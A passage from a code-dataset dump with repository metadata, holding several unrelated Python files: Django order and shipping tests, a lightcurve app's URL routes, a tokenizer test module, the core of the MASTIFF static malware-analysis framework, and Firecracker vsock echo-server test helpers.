self.assertEqual(('SHIPPED', 'CANCELLED'),
self.order.available_statuses())
def test_available_statuses_for_shipped_order(self):
self.order = create_order(status='SHIPPED')
self.assertEqual(('COMPLETE',), self.order.available_statuses())
def test_no_statuses_available_for_no_status(self):
self.order = create_order()
self.assertEqual((), self.order.available_statuses())
def test_set_status_respects_pipeline(self):
self.order = create_order(status='SHIPPED')
with self.assertRaises(InvalidOrderStatus):
self.order.set_status('PENDING')
def test_set_status_does_nothing_for_same_status(self):
self.order = create_order(status='PENDING')
self.order.set_status('PENDING')
self.assertEqual('PENDING', self.order.status)
def test_set_status_works(self):
self.order = create_order(status='PENDING')
self.order.set_status('SHIPPED')
self.assertEqual('SHIPPED', self.order.status)
def test_cascading_status_change(self):
self.order = create_order(status='PENDING')
self.order.set_status('SHIPPED')
for line in self.order.lines.all():
self.assertEqual('SHIPPED', line.status)
class OrderNoteTests(TestCase):
def setUp(self):
self.order = create_order()
def test_system_notes_are_not_editable(self):
note = self.order.notes.create(note_type=OrderNote.SYSTEM, message='test')
self.assertFalse(note.is_editable())
def test_non_system_notes_are_editable(self):
note = self.order.notes.create(message='test')
self.assertTrue(note.is_editable())
def test_notes_are_not_editable_after_timeout(self):
OrderNote.editable_lifetime = 1
note = self.order.notes.create(message='test')
self.assertTrue(note.is_editable())
now = timezone.now()
with mock.patch.object(timezone, 'now') as mock_timezone:
mock_timezone.return_value = now + timedelta(seconds=30)
self.assertFalse(note.is_editable())
class LineTests(TestCase):
def setUp(self):
basket = create_basket(empty=True)
add_product(basket, D('10.00'), 4)
self.order = create_order(number='100002', basket=basket)
self.line = self.order.lines.all()[0]
self.order_placed, __ = ShippingEventType.objects.get_or_create(
code='order_placed', name='Order placed')
self.dispatched, __ = ShippingEventType.objects.get_or_create(
code='dispatched', name='Dispatched')
def tearDown(self):
ShippingEventType.objects.all().delete()
def event(self, type, quantity=None):
"""
Creates a shipping event for the test line
"""
event = ShippingEvent.objects.create(order=self.order, event_type=type)
if quantity is None:
quantity = self.line.quantity
ShippingEventQuantity.objects.create(
event=event, line=self.line, quantity=quantity)
def test_shipping_event_history(self):
self.event(self.order_placed, 3)
self.event(self.dispatched, 1)
history = self.line.shipping_event_breakdown
self.assertEqual(3, history['Order placed']['quantity'])
self.assertEqual(1, history['Dispatched']['quantity'])
def test_shipping_status_is_empty_to_start_with(self):
self.assertEquals('', self.line.shipping_status)
def test_shipping_status_after_full_line_event(self):
self.event(self.order_placed)
self.assertEquals(self.order_placed.name, self.line.shipping_status)
def test_shipping_status_after_two_full_line_events(self):
type1 = self.order_placed
self.event(type1)
type2 = self.dispatched
self.event(type2)
self.assertEquals(type2.name, self.line.shipping_status)
def test_shipping_status_after_partial_line_event(self):
type = self.order_placed
self.event(type, 3)
expected = "%s (%d/%d items)" % (type.name, 3, self.line.quantity)
self.assertEquals(expected, self.line.shipping_status)
def test_has_passed_shipping_status_after_full_line_event(self):
type = self.order_placed
self.event(type)
self.assertTrue(self.line.has_shipping_event_occurred(type))
def test_has_passed_shipping_status_after_partial_line_event(self):
type = self.order_placed
self.event(type, self.line.quantity - 1)
self.assertFalse(self.line.has_shipping_event_occurred(type), 1)
def test_has_passed_shipping_status_after_multiple_line_event(self):
event_types = [ShippingEventType.objects.get(code='order_placed'),
ShippingEventType.objects.get(code='dispatched')]
for type in event_types:
self.event(type)
for type in event_types:
self.assertTrue(self.line.has_shipping_event_occurred(type))
def test_inconsistent_shipping_status_setting(self):
type = self.order_placed
self.event(type, self.line.quantity - 1)
with self.assertRaises(InvalidShippingEvent):
self.event(type, self.line.quantity)
def test_inconsistent_shipping_quantities(self):
type = ShippingEventType.objects.get(code='order_placed')
self.event(type, self.line.quantity - 1)
with self.assertRaises(InvalidShippingEvent):
# Total quantity is too high
self.event(type, 2)
class LineStatusTests(TestCase):
def setUp(self):
Line.pipeline = {'A': ('B', 'C'),
'B': ('C',)}
self.order = create_order()
self.line = self.order.lines.all()[0]
self.line.status = 'A'
self.line.save()
def test_all_statuses_class_method(self):
self.assertEqual(['A', 'B'], Line.all_statuses())
def test_invalid_status_set_raises_exception(self):
with self.assertRaises(InvalidLineStatus):
self.line.set_status('D')
def test_set_status_changes_status(self):
self.line.set_status('C')
self.assertEqual('C', self.line.status)
def test_setting_same_status_does_nothing(self):
self.line.set_status('A')
class ShippingEventTypeTests(TestCase):
def tearDown(self):
ShippingEventType.objects.all().delete()
def test_code_is_set_automatically(self):
etype = ShippingEventType.objects.create(name='Returned')
self.assertEqual('returned', etype.code)
class ShippingEventQuantityTests(TestCase):
def setUp(self):
basket = create_basket(empty=True)
add_product(basket, D('10.00'), 4)
self.order = create_order(number='100002', basket=basket)
self.line = self.order.lines.all()[0]
self.shipped, __ = ShippingEventType.objects.get_or_create(
name='Shipped')
self.returned, __ = ShippingEventType.objects.get_or_create(
name='Returned')
def tearDown(self):
ShippingEventType.objects.all().delete()
def test_quantity_defaults_to_all(self):
event = self.order.shipping_events.create(event_type=self.shipped)
event_quantity = ShippingEventQuantity.objects.create(event=event, line=self.line)
self.assertEquals(self.line.quantity, event_quantity.quantity)
def test_event_is_created_ok_when_prerequisites_are_met(self):
shipped_event = self.order.shipping_events.create(event_type=self.shipped)
ShippingEventQuantity.objects.create(event=shipped_event,
line=self.line)
event = self.order.shipping_events.create(event_type=self.returned)
ShippingEventQuantity.objects.create(event=event,
line=self.line,
quantity=1)
class TestOrderDiscount(TestCase):
def test_can_be_created_without_offer_or_voucher(self):
order = create_order(number='100002')
discount = OrderDiscount.objects.create(order=order, amount=D('10.00'))
self.assertTrue(discount.voucher is None)
self.assertTrue(discount.offer is None)
self.assertEquals(discount.description(), u'')
def test_can_be_created_with_an_offer(self):
offer = create_offer()
order = create_order(number='100002')
discount = OrderDiscount.objects.create(order=order, amount=D('10.00'),
offer_id=offer.id)
self.assertEqual(offer.id, discount.offer.id)
self.assertEqual(offer.name, discount.offer_name)
def test_can_be_created_with_an_offer_and_specified_offer_name(self):
offer = create_offer(name="My offer")
order = create_order(number='100002')
discount = OrderDiscount.objects.create(order=order, amount=D('10.00'),
offer_id=offer.id,
offer_name="Your offer")
self.assertEqual(offer.id, discount.offer.id)
self.assertEqual("Your offer", discount.offer_name)
def test_can_be_created_with_a_voucher(self):
voucher = create_voucher()
order = create_order(number='100002')
discount = OrderDiscount.objects.create(order=order, amount=D('10.00'),
voucher_id=voucher.id)
self.assertEqual(voucher.id, discount.voucher.id)
self.assertEqual(voucher.code, discount.voucher_code)
def test_can_be_created_with_a_voucher_and_specidied_voucher_code(self):
voucher = create_voucher()
order = create_order(number='100002')
discount = OrderDiscount.objects.create(order=order, amount=D('10.00'),
voucher_id=voucher.id,
voucher_code="anothercode")
self.assertEqual(voucher.id, discount.voucher.id)
self.assertEqual('anothercode', discount.voucher_code)
def test_contains_offer_details_after_offer_is_deleted(self):
offer = create_offer(name="Get 200% off")
order = create_order(number='100002')
discount = OrderDiscount.objects.create(order=order, amount=D('10.00'),
offer_id=offer.id)
offer.delete()
self.assertTrue(discount.voucher is None)
self.assertTrue(discount.offer is None)
self.assertEquals(discount.description(), u'Get 200% off')
def test_contains_voucher_details_after_voucher_is_deleted(self):
voucher = create_voucher()
order = create_order(number='100002')
discount = OrderDiscount.objects.create(order=order, amount=D('10.00'),
voucher_id=voucher.id)
voucher.delete()
self.assertTrue(discount.voucher is None)
self.assertTrue(discount.offer is None)
self.assertEquals(discount.description(), voucher.code)
| 38.965732 | 94 | 0.660777 |
ace94efd4ac2262d54ee8b49b75decc98173fa69 | 1,619 | py | Python | lightcurve/urls.py | typpo/astrokit | f3c16f73ac842be26cdf20231ac5b915ab68e68f | [
"MIT"
] | 8 | 2016-01-23T11:06:10.000Z | 2021-06-27T01:38:19.000Z | lightcurve/urls.py | typpo/astrokit | f3c16f73ac842be26cdf20231ac5b915ab68e68f | [
"MIT"
] | 119 | 2017-02-06T18:41:47.000Z | 2022-01-13T00:43:35.000Z | lightcurve/urls.py | typpo/astrokit | f3c16f73ac842be26cdf20231ac5b915ab68e68f | [
"MIT"
] | 7 | 2016-07-19T15:49:17.000Z | 2020-10-03T05:53:52.000Z | from django.conf.urls import patterns, url
urlpatterns = patterns('lightcurve.views',
url(r'^(?P<lightcurve_id>[0-9]+)/edit$', 'edit_lightcurve', name='edit_lightcurve'),
url(r'^(?P<lightcurve_id>[0-9]+)/images$', 'images', name='images'),
url(r'^(?P<lightcurve_id>[0-9]+)/plot$', 'plot_lightcurve', name='plot_lightcurve'),
url(r'^(?P<lightcurve_id>[0-9]+)/plot_json$', 'plot_lightcurve_json', name='plot_lightcurve_json'),
url(r'^(?P<lightcurve_id>[0-9]+)/status$', 'status', name='status'),
url(r'^(?P<lightcurve_id>[0-9]+)/save_observation_default$', 'save_observation_default', name='save_observation_default'),
url(r'^(?P<lightcurve_id>[0-9]+)/apply_photometry_settings$', 'apply_photometry_settings', name='apply_photometry_settings'),
url(r'^(?P<lightcurve_id>[0-9]+)/save_image_pairs$', 'save_image_pairs', name='save_image_pairs'),
url(r'^(?P<lightcurve_id>[0-9]+)/add_images$', 'add_images', name='add_images'),
url(r'^(?P<lightcurve_id>[0-9]+)/add_image_toggle$', 'add_image_toggle', name='add_image_toggle'),
url(r'^(?P<lightcurve_id>[0-9]+)/comparison_desigs$', 'comparison_desigs', name='comparison_desigs'),
url(r'^(?P<lightcurve_id>[0-9]+)/edit_lightcurve_name$', 'edit_lightcurve_name', name='edit_lightcurve_name'),
url(r'^(?P<lightcurve_id>[0-9]+)/download$', 'download', name='download'),
url(r'^(?P<lightcurve_id>[0-9]+)/run_image_reductions$', 'run_image_reductions', name='run_image_reductions'),
url(r'^my-lightcurve$', 'my_lightcurve', name='my_lightcurve'),
url(r'^all-lightcurve$', 'all_lightcurve', name='all_lightcurve'),
)
| 77.095238 | 129 | 0.692403 |
ace94fdd1a5d1a726c3840db2b66e4f0a053e05c | 193 | py | Python | utils/test_module/custom_tokenization_fast.py | dctelus/transformers | 6786cbc4b14ebff0ac59c768cadd109391db9a08 | [
"Apache-2.0"
] | 8,028 | 2018-11-05T15:19:44.000Z | 2019-07-16T09:14:59.000Z | utils/test_module/custom_tokenization_fast.py | arron1227/transformers | b18dfd95e1f60ae65a959a7b255fc06522170d1b | [
"Apache-2.0"
] | 731 | 2018-11-05T21:35:52.000Z | 2019-07-16T09:51:26.000Z | utils/test_module/custom_tokenization_fast.py | arron1227/transformers | b18dfd95e1f60ae65a959a7b255fc06522170d1b | [
"Apache-2.0"
] | 2,106 | 2018-11-05T15:29:15.000Z | 2019-07-16T08:51:57.000Z | from transformers import BertTokenizerFast
from .custom_tokenization import CustomTokenizer
class CustomTokenizerFast(BertTokenizerFast):
slow_tokenizer_class = CustomTokenizer
pass
| 21.444444 | 48 | 0.84456 |
ace95027e1cc1f56614eaa0fc86d67b5c4aed8bb | 21,500 | py | Python | mastiff/core.py | tt1379/mastiff | 04d569e4fa59513572e77c74b049cad82f9b0310 | [
"Apache-2.0"
] | 164 | 2015-02-09T18:19:26.000Z | 2022-02-23T09:49:18.000Z | mastiff/core.py | ashishhmittal/mastiff | 04d569e4fa59513572e77c74b049cad82f9b0310 | [
"Apache-2.0"
] | 1 | 2016-05-20T16:21:33.000Z | 2016-05-20T16:21:33.000Z | mastiff/core.py | ashishhmittal/mastiff | 04d569e4fa59513572e77c74b049cad82f9b0310 | [
"Apache-2.0"
] | 43 | 2015-03-03T11:15:58.000Z | 2021-10-02T02:14:57.000Z | #!/usr/bin/env python
"""
Copyright 2012-2013 The MASTIFF Project, All Rights Reserved.
This software, having been partly or wholly developed and/or
sponsored by KoreLogic, Inc., is hereby released under the terms
and conditions set forth in the project's "README.LICENSE" file.
For a list of all contributors and sponsors, please refer to the
project's "README.CREDITS" file.
"""
__doc__ = """
MASTIFF - MAlicious Static Inspection File Framework
This module implements the primary class for static analysis inspection.
Mastiff member variables:
cat_paths: List that contains the path to the category plug-ins.
plugin_paths: List that contains the paths to the analysis plug-ins.
filetype: Dictionary used to store the output from the file-type identification
functions.
file_name: full path to the file being analyzed.
hashes: Tuple of the MD5, SHA1 and SHA256 hashes of the file being analyzed.
This is also stored in the configuration file.
db: Sqlite3 Connection class to the database file.
cat_list: List that contains all of the category plug-ins to be used during
analysis.
activated_plugins: List that contains all of the plug-ins that have been
activated. This order of the plug-ins in this list is the order they will run.
cat_manager: Yapsy PluginManager class that manages the category plug-ins.
plugin_manager: Yapsy PluginManager class that manages the analysis plug-ins.
Mastiff member functions:
__init__(self, config_file=None, fname=None, loglevel=logging.INFO, override=None)
The initialization function of the class. This function will initialize all of the
member variables, set up logging, read in and store the configuration file, and
find and load all plug-ins.
init_file(self, fname)
This function validates the filename being analyzed
to ensure it exists and can be accessed, sets up the directory that all
output will be logged into, and adds initial file information into the
database.
set_filetype(self, fname=None, ftype=None)
Calls the file-type identification helper functions in mastiff/filetype.py,
and loops through all of the category plug-ins to determine which ones will
analyze the file.
validate(self, name, plugin)
Validates an analysis plug-in to ensure that it contains the correct functions.
activate_plugins(self, single_plugin=None)
Loops through all analysis plug-ins for category classes relevant to the file
type being examined and ensures they are valid. If validated, the analysis
plug-in is activated. This function also ensures that any pre-requisite plug-ins
have been activated.
analyze(self, fname=None, single_plugin=None)
Ensures the file type of the file is set up and loops through all activated
analysis plug-ins and calls their analyze() function.
list_plugins(self, type='analysis')
Helper function that loops through all available plug-ins and prints out their
name, path and description. The function can print out analysis or category
plug-in information.
"""
__version__ = "$Id: ace95027e1cc1f56614eaa0fc86d67b5c4aed8bb $"
import sys
import os
import logging
import hashlib
from shutil import copyfile
from operator import attrgetter
import simplejson
if sys.version_info < (2, 6, 6):
sys.stderr.write("Mastiff requires python version 2.6.6")
sys.exit(1)
try:
from yapsy.PluginManager import PluginManager
except ImportError, err:
print "Yapsy not installed or accessible: %s" % err
sys.exit(1)
import mastiff.conf as Conf
import mastiff.filetype as FileType
import mastiff.sqlite as DB
import mastiff.plugins.category.categories as Cats
import mastiff.plugins.analysis as analysis
import mastiff.plugins.output as masOutput
class Mastiff:
"""Primary class for the static analysis inspection framework."""
def __init__(self, config_file=None, fname=None, loglevel=logging.INFO, override=None):
"""Initialize variables."""
# configure logging for Mastiff module
format_ = '[%(asctime)s] [%(levelname)s] [%(name)s] : %(message)s'
logging.basicConfig(format=format_)
log = logging.getLogger("Mastiff")
log.setLevel(loglevel)
if log.handlers:
log.handlers = []
# read in config file
self.config = Conf.Conf(config_file, override=override)
# make sure base logging dir exists
log_dir = self.config.get_var('Dir','log_dir')
log_dir = os.path.abspath(os.path.expanduser(log_dir))
if not os.path.isdir(log_dir):
try:
os.makedirs(log_dir)
except OSError, err:
log.error('Could not make %s: %s. Exiting.', log_dir, err)
sys.exit(1)
self.config.set_var('Dir', 'base_dir', log_dir)
# set up file to log output to
fh = logging.FileHandler(log_dir + os.sep + 'mastiff.log' )
fh.setFormatter(logging.Formatter(format_))
log.addHandler(fh)
fh.setLevel(loglevel)
# verbose logging set in the config and not command line?
if self.config.get_bvar('Misc','verbose') == True and \
loglevel != logging.ERROR:
log.setLevel(logging.DEBUG)
fh.setLevel(logging.DEBUG)
# get path to category plugins
self.cat_paths = [ os.path.dirname(Cats.__file__) ]
self.output_paths = [ os.path.dirname(masOutput.__file__) ]
# convert plugin paths to list
self.plugin_paths = [ os.path.dirname(analysis.__file__)]
# strip whitespace from dirs
for tmp in str(self.config.get_var('Dir','plugin_dir')).split(','):
if tmp:
self.plugin_paths.append(os.path.expanduser(tmp.lstrip().rstrip()))
# do the same for output plugins
for tmp in str(self.config.get_var('Dir','output_plugin_dir')).split(','):
if tmp:
self.output_paths.append(os.path.expanduser(tmp.lstrip().rstrip()))
self.filetype = dict()
self.file_name = None
self.hashes = None
self.cat_list = list()
self.activated_plugins = list()
# Build the managers
self.cat_manager = PluginManager()
self.plugin_manager = PluginManager()
self.output_manager = PluginManager()
# Find and load all category plugins
cat_filter = dict()
self.cat_manager.setPluginPlaces(self.cat_paths)
self.cat_manager.collectPlugins()
# Import all of the modules for the categories so we can access
# their classes.
for pluginInfo in self.cat_manager.getAllPlugins():
log.debug('Found category: %s', pluginInfo.name)
try:
mod_name = "mastiff.plugins.category.%s" % \
os.path.basename(pluginInfo.path)
cat_mod = __import__(mod_name,
fromlist=["mastiff.plugins.category"])
except ImportError, err:
log.error("Unable to import category %s: %s",
pluginInfo.name,
err)
self.cat_manager.deactivatePluginByName(pluginInfo.name)
continue
else:
# We were able to import it, activate it
self.cat_manager.activatePluginByName(pluginInfo.name)
log.debug("Activated category: %s", pluginInfo.name)
# Cat is imported, add class to the category filter
# cat_filter will be a dict in the form:
# { cat_name: cat_class }
# and contains all the category plugins that have been activated
cat_class = getattr(cat_mod,
pluginInfo.plugin_object.__class__.__name__)
cat_filter.update({pluginInfo.plugin_object.cat_name: cat_class})
#log.debug("Category Filters: %s", cat_filter)
# Now collect and load all analysis plugins
self.plugin_manager.setPluginPlaces(self.plugin_paths)
self.plugin_manager.setCategoriesFilter( cat_filter )
self.plugin_manager.collectPlugins()
# Finally collect all output plugins
self.output_manager.setPluginPlaces(self.output_paths)
self.output_manager.collectPlugins()
# set up database
self.db = DB.open_db_conf(self.config)
DB.create_mastiff_tables(self.db)
# set up the output object
self.output = dict()
# init the filename if we have it
if fname is not None:
self.init_file(fname)
def __del__(self):
"""
Class destructor.
"""
# Close down all logging file handles so we don't have any open file descriptors
log = logging.getLogger("Mastiff")
handles = list(log.handlers)
for file_handle in handles:
log.removeHandler(file_handle)
file_handle.close()
def init_file(self, fname):
"""
Validate the filename to ensure it can be accessed and set
up class variables.
This function is called when a filename is given or can be
called directly.
"""
log = logging.getLogger("Mastiff.Init_File")
if fname is None:
return None
try:
with open(fname, 'rb') as my_file:
data = my_file.read()
except IOError, err:
log.error("Could not open file: %s", err)
return None
self.file_name = fname
# create tuple of md5, sha1 and sha256 hashes
self.hashes = hashlib.md5(data).hexdigest(), \
hashlib.sha1(data).hexdigest(), \
hashlib.sha256(data).hexdigest()
self.config.set_var('Misc', 'hashes', self.hashes)
self.output[self.hashes] = dict()
# update log_dir
log_dir = os.path.abspath(os.path.expanduser(self.config.get_var('Dir','log_dir'))) + \
os.sep + \
self.hashes[0]
self.config.set_var('Dir', 'log_dir', log_dir)
# create log dir
if not os.path.exists(log_dir):
try:
os.makedirs(log_dir)
except OSError, err:
log.error('Could not make %s: %s. Exiting.', log_dir, err)
sys.exit(1)
# lets set up the individual log file
# we may miss out on a couple prior logs, but thats OK
log = logging.getLogger('Mastiff')
fh = logging.FileHandler(log_dir + os.sep + 'mastiff.log' )
format_ = '[%(asctime)s] [%(levelname)s] [%(name)s] : %(message)s'
fh.setFormatter(logging.Formatter(format_))
log.addHandler(fh)
fh.setLevel(logging.INFO)
log = logging.getLogger("Mastiff.Init_File")
log.info('Analyzing %s.', self.file_name)
log.info("Log Directory: %s", log_dir)
# copy file to the log directory
if self.config.get_bvar('Misc', 'copy') is True:
try:
copyfile(self.file_name, log_dir + os.sep + os.path.basename(self.file_name) + '.VIR')
except IOError, err:
log.error('Unable to copy file: %s', err)
log.debug('Copied file to log directory.')
else:
log.debug('Configuration set to not copy file.')
# add entry to database if it exists
if self.db is not None:
log.debug('Adding entry to database.')
DB.insert_mastiff_item(self.db, self.hashes)
return self.hashes
def activate_plugins(self, single_plugin=None):
"""
Activate all plugins that are in the categories we selected.
If single_plugin is given, only activate that plug-in.
Note: File Information plug-in is ALWAYS run.
"""
has_prereq = list()
for cats in self.cat_list:
log = logging.getLogger('Mastiff.Plugins.Activate')
log.debug('Activating plugins for category %s.', cats)
self.output[self.hashes][cats] = dict()
for plugin in self.plugin_manager.getPluginsOfCategory(cats):
# check if we are running a single plugin - file information always gets run
if single_plugin is not None and single_plugin != plugin.name and plugin.name != 'File Information':
continue
plugin.plugin_object.set_name(plugin.name)
log.debug('Validating plugin "%s"', plugin.name)
# if the plugin validates, try to activate it
if self.validate(plugin.name, plugin.plugin_object) == True:
if plugin.plugin_object.prereq is not None:
# this plugin has a pre-req, can't activate yet
has_prereq.append([cats, plugin])
else:
log.debug('Activating "%s".', plugin.name)
self.plugin_manager.activatePluginByName(plugin.name, cats)
self.activated_plugins.append(plugin)
else:
log.debug("Removing plugin %s %s.", plugin.name, cats)
self.plugin_manager.deactivatePluginByName(plugin.name,
cats)
# now try to activate any plug-ins that have pre-reqs
flag = True
while flag is True:
flag = False
for plugins in has_prereq:
# check to see if the pre-req in in the activated list
inact = [p for p in self.activated_plugins if p.name == plugins[1].plugin_object.prereq]
if len(inact) > 0:
# our pre-req has been activated, we can activate ourself
log.debug('Activating "%s". Pre-req fulfilled.', plugins[1].name)
self.plugin_manager.activatePluginByName(plugins[1].name, plugins[0])
self.activated_plugins.append(plugins[1])
has_prereq.remove(plugins)
flag = True
# list out any plugins that were not activated due to missing pre-reqs
for plugins in has_prereq:
log.debug("Plugin %s not activated due to missing pre-req \"%s.\"" % \
(plugins[1].name, plugins[1].plugin_object.prereq ))
# finally activate the output plugins
for plugin in self.output_manager.getAllPlugins():
plugin.plugin_object.set_name(plugin.name)
log.debug('Activating Output Plug-in "{}"'.format(plugin.name))
self.output_manager.activatePluginByName(plugin.name)
#self.activated_plugins.append(plugin)
def list_plugins(self, ctype='analysis'):
"""Print out a list of analysis or cat plugins."""
if ctype == 'analysis':
# analysis plug-ins
print "Analysis Plug-in list:\n"
print "%-25s\t%-15s\t%-25s\n%-50s" % \
("Name", "Category", "Description", "Path")
print '-' * 80
for plugin in sorted(self.plugin_manager.getAllPlugins(),
key=attrgetter('plugin_object.cat_name', 'name')):
print "%-25s\t%-15s\t%-12s\n%-80s\n" % \
(plugin.name, plugin.plugin_object.cat_name, \
plugin.description, plugin.path)
elif ctype == 'cat':
print "Category Plug-in list:\n"
print "%-25s\t%-15s\t%-s" % ("Name", "FType", "Description")
print '-' * 80
# category plug-ins
for plugin in sorted(self.cat_manager.getAllPlugins(),
key=attrgetter('name')):
print "%-25s\t%-15s\t%-s" % \
(plugin.name, plugin.plugin_object.cat_name,
plugin.description)
elif ctype == 'output':
print "Output Plug-in list:\n"
print "%-25s\t%-s\n%s" % ("Name", "Description", "Path")
print '-' * 80
# category plug-ins
for plugin in sorted(self.output_manager.getAllPlugins(),
key=attrgetter('name')):
print "%-25s\t%-s\n%-80s\n" % \
(plugin.name, plugin.description, plugin.path)
else:
print "Unknown plugin type."
def set_filetype(self, fname=None, ftype=None):
"""
Calls the filetype functions and loops through the category
plug-ins to see which ones will handle this file.
"""
log = logging.getLogger('Mastiff.FileType')
if fname is None and self.file_name is None:
log.error("No file to analyze has been specified. Exiting.")
sys.exit(1)
elif fname is not None and self.file_name is None:
if self.init_file(fname) is None:
log.error("ERROR accessing file. Exiting.")
sys.exit(1)
if self.cat_list:
# if self.cat_list is already set, assume that we've already
# gone through this function
return self.filetype
if ftype is not None:
# we are forcing a file type to run
log.info('Forcing category plug-in "%s" to be added.', ftype)
self.cat_list.append(ftype)
# Grab the magic file type of the file. This is done here so as not
# to do it in every category plug-in.
self.filetype['magic'] = FileType.get_magic(self.file_name)
# Grab the TrID type
trid_opts = self.config.get_section('File ID')
self.filetype['trid'] = list()
if trid_opts['trid']:
self.filetype['trid'] = FileType.get_trid(self.file_name,
trid_opts['trid'],
trid_opts['trid_db'])
# Cycle through all of the categories and see if they should be added
# to the list of categories to be run.
for pluginInfo in self.cat_manager.getAllPlugins():
cat_name = pluginInfo.plugin_object.is_my_filetype(self.filetype,
self.file_name)
log.debug('Checking cat %s for filetype.', pluginInfo.name)
if cat_name is not None:
# cat_list contains analysis plugin categories to be used
self.cat_list.append(cat_name)
log.debug('Adding %s to plugin selection list.', cat_name)
# add file type to the DB
if self.db is not None:
DB.insert_mastiff_item(self.db, self.hashes, self.cat_list)
return self.filetype
def validate(self, name, plugin):
"""Return false if a plugin does not have the correct functions."""
log = logging.getLogger('Mastiff.Plugins.Validate')
try:
callable(plugin.activate)
except AttributeError:
log.error("%s missing activate function.", name)
return False
try:
callable(plugin.deactivate)
except AttributeError:
log.error("%s missing deactivate function.", name)
return False
try:
callable(plugin.analyze)
except AttributeError:
log.error("%s missing analyze function.", name)
return False
return True
def analyze(self, fname=None, single_plugin=None):
"""Perform analysis on a given filename."""
log = logging.getLogger('Mastiff.Analysis')
if fname is None and self.file_name is None:
log.error("No filename specified. Exiting.")
sys.exit(1)
elif fname is not None and self.file_name is None:
# first time seeing the file, initialize it
if self.init_file(fname) is None:
log.error("ERROR accessing file. Exiting.")
return False
# set the file_type
ftype = self.set_filetype()
log.info('File categories are %s.', self.cat_list)
if not self.filetype:
log.error("The file type has not been set. Exiting.")
sys.exit(1)
# activate the plugins
self.activate_plugins(single_plugin)
for plugin in self.activated_plugins:
# skip if plugin is not activated
if plugin.is_activated == False:
continue
log.debug('Calling plugin "%s".', plugin.name)
# set the output results to be an attribute of the plugin so it can analyze it
setattr(plugin.plugin_object, 'results', self.output[self.hashes])
# analyze the plugin - if plugin is compliant with universal output
# its output will be returned
plug_out = plugin.plugin_object.analyze(self.config, self.file_name)
if plug_out is not False and plug_out is not None and isinstance(plug_out, masOutput.page):
# add the plugin output to its own entry
self.output[self.hashes][plugin.plugin_object.cat_name][plugin.plugin_object.name] = plug_out
# go through output plugins and output the data
for plugin in self.output_manager.getAllPlugins():
plugin.plugin_object.output(self.config, self.output)
self.config.dump_config()
log.info('Finished analysis for %s.', self.file_name)
# end class mastiff
| 38.738739 | 116 | 0.608326 |
ace9514ecd3fbe08a535278557a034a412478c3a | 8,344 | py | Python | tests/framework/utils_vsock.py | psalaberria002/firecracker | 86340cb109d7eb1174bb080ef0bcb0aadc80b0f9 | [
"Apache-2.0"
] | 17,668 | 2018-11-27T04:47:42.000Z | 2022-03-31T21:28:10.000Z | tests/framework/utils_vsock.py | psalaberria002/firecracker | 86340cb109d7eb1174bb080ef0bcb0aadc80b0f9 | [
"Apache-2.0"
] | 1,661 | 2018-11-27T05:44:54.000Z | 2022-03-31T19:27:28.000Z | tests/framework/utils_vsock.py | psalaberria002/firecracker | 86340cb109d7eb1174bb080ef0bcb0aadc80b0f9 | [
"Apache-2.0"
] | 1,407 | 2018-11-27T05:06:02.000Z | 2022-03-31T13:29:44.000Z | # Copyright 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
"""Helper functions for testing vsock device."""
import hashlib
import os.path
from select import select
from socket import socket, AF_UNIX, SOCK_STREAM
from threading import Thread, Event
import re
from host_tools.network import SSHConnection
ECHO_SERVER_PORT = 5252
SERVER_ACCEPT_BACKLOG = 128
TEST_CONNECTION_COUNT = 50
BLOB_SIZE = 20 * 1024 * 1024
BUF_SIZE = 64 * 1024
class HostEchoServer(Thread):
"""A simple "echo" server for vsock.
This server will accept incoming connections (initiated by the guest vm),
and, for each connection, it will read any incoming data and then echo it
right back.
"""
def __init__(self, vm, path):
"""."""
super().__init__()
self.vm = vm
self.sock = socket(AF_UNIX, SOCK_STREAM)
self.sock.bind(path)
self.sock.listen(SERVER_ACCEPT_BACKLOG)
self.error = None
self.clients = []
self.exit_evt = Event()
# Link the listening Unix socket into the VM's jail, so that
# Firecracker can connect to it.
vm.create_jailed_resource(path)
def run(self):
"""Thread code payload.
Wrap up the real "run" into a catch-all block, because Python cannot
into threads - if this thread were to raise an unhandled exception,
the whole process would lock.
"""
try:
self._run()
# pylint: disable=broad-except
except Exception as err:
self.error = err
def _run(self):
while not self.exit_evt.is_set():
watch_list = self.clients + [self.sock]
rd_list, _, _ = select(watch_list, [], [], 1)
for rdo in rd_list:
if rdo == self.sock:
# Read event on the listening socket: a new client
# wants to connect.
(client, _) = self.sock.accept()
self.clients.append(client)
continue
# Read event on a connected socket: new data is
# available from some client.
buf = rdo.recv(BUF_SIZE)
if not buf:
# Zero-length read: connection reset by peer.
self.clients.remove(rdo)
continue
sent = 0
while sent < len(buf):
# Send back everything we just read.
sent += rdo.send(buf[sent:])
def exit(self):
"""Shut down the echo server and wait for it to exit.
This method can be called from any thread. Upon returning, the
echo server will have shut down.
"""
self.exit_evt.set()
self.join()
class HostEchoWorker(Thread):
"""A vsock echo worker, connecting to a guest echo server.
This will initiate a connection to a guest echo server, then start sending
it the contents of the file at `blob_path`. The echo server should send
the exact same data back, so a hash is performed on everything received
from the server. This hash will later be checked against the hashed
contents of `blob_path`.
"""
def __init__(self, uds_path, blob_path):
"""."""
super().__init__()
self.uds_path = uds_path
self.blob_path = blob_path
self.hash = None
self.error = None
self.sock = _vsock_connect_to_guest(self.uds_path, ECHO_SERVER_PORT)
def run(self):
"""Thread code payload.
Wrap up the real "run" into a catch-all block, because Python cannot
into threads - if this thread were to raise an unhandled exception,
the whole process would lock.
"""
try:
self._run()
# pylint: disable=broad-except
except Exception as err:
self.error = err
def close_uds(self):
"""Close vsock UDS connection."""
self.sock.close()
def _run(self):
blob_file = open(self.blob_path, 'rb')
hash_obj = hashlib.md5()
while True:
buf = blob_file.read(BUF_SIZE)
if not buf:
break
sent = self.sock.send(buf)
while sent < len(buf):
sent += self.sock.send(buf[sent:])
buf = self.sock.recv(sent)
while len(buf) < sent:
buf += self.sock.recv(sent - len(buf))
hash_obj.update(buf)
self.hash = hash_obj.hexdigest()
def make_blob(dst_dir):
"""Generate a random data file."""
blob_path = os.path.join(dst_dir, "vsock-test.blob")
blob_file = open(blob_path, 'wb')
left = BLOB_SIZE
blob_hash = hashlib.md5()
while left > 0:
count = min(left, 4096)
buf = os.urandom(count)
blob_hash.update(buf)
blob_file.write(buf)
left -= count
blob_file.close()
return blob_path, blob_hash.hexdigest()
def check_host_connections(vm, uds_path, blob_path, blob_hash):
"""Test host-initiated connections.
This will start a daemonized echo server on the guest VM, and then spawn
